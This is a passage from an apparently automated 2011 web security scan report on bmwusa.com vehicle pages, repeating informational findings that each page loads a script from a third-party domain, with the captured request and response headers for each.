Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:38 GMT;path=/
Content-Length: 214419


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.269. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:56:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:16:25 GMT;path=/
Content-Length: 223508


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.270. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:48 GMT;path=/
Content-Length: 213474


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.271. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:55:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:15:48 GMT;path=/
Content-Length: 202181


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.272. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/activehybridx6/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:12 GMT;path=/
Content-Length: 212497


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.273. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:59:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:15 GMT;path=/
Content-Length: 212498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.274. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:07 GMT;path=/
Content-Length: 229245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.275. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:00:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:55 GMT;path=/
Content-Length: 229246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.276. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:00:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:10 GMT;path=/
Content-Length: 215531


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.277. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:59:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:49 GMT;path=/
Content-Length: 215532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.278. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:00:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:51 GMT;path=/
Content-Length: 202378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.279. http://www.bmwusa.com/standard/content/vehicles/2011/x6/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:58:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:18:17 GMT;path=/
Content-Length: 195775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.280. http://www.bmwusa.com/standard/content/vehicles/2011/x6/x6explore.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/x6explore.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/x6explore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:59:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:12 GMT;path=/
Content-Length: 179285


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.281. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive35i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/xdrive35i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:21 GMT;path=/
Content-Length: 212726


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.282. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
